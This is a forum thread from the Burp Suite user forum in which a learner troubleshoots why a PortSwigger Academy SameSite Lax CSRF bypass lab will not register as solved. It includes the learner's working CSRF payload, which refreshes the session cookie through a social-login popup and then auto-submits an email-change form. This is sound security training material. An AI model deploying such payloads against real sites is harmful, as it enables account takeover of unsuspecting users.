Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Problem with Solving the SameSite Lax bypass via cookie refresh lab

kaiwhata | Last updated: Oct 03, 2024 09:47PM UTC

I've tried to complete the https://portswigger.net/web-security/learning-paths/csrf/csrf-bypassing-samesite-lax-restrictions-with-newly-issued-cookies/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-cookie-refresh# several times over the last few days - but I cant get the lab to mark as Solved. I've checked that my payload works on Chrome and the Burp browser, and I've tried the payload from the solution (alongside a couple of others from the internet) - but try as I might the lab won't recognise the completion for some reason. I'm making sure to change the email address each time as well. And I've completely restarted the lab 3 separate times (which usually fixes this issue with other labs) Any suggestions for what else to try? Here's my payload for reference: " <form method="POST" action="https://labidx.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="pwned@pwned.net"> </form> <p>Click anywhere on the page</p> <script> window.onclick = () => { window.open("https://labidx.web-security-academy.net/social-login"); setTimeout(changeEmail, 5000); } function changeEmail() { document.forms[0].submit(); } </script> "

Ben, PortSwigger Agent | Last updated: Oct 04, 2024 10:13AM UTC

Hi, To confirm, if you view the access log within this lab, after you have delivered your exploit, do you see any visits from the victim user?

kaiwhata | Last updated: Oct 06, 2024 08:46PM UTC

Ugh - I totally should have checked that! No - I'm not seeing any visits in the Access Log from the Victim user - which totally explains things. I'm only seeing incoming requests from a single IP.

Ben, PortSwigger Agent | Last updated: Oct 07, 2024 08:51AM UTC

Hi, We were experiencing some issues last week with the performance of the Web Academy environment and have since redeployed the environment - this might have impacted your efforts to solve this lab. I have just run through this particular lab right now and been able to solve it so it does appear to now be functioning as expected - if you try this again are you still seeing the same issues?

kaiwhata | Last updated: Oct 07, 2024 07:31PM UTC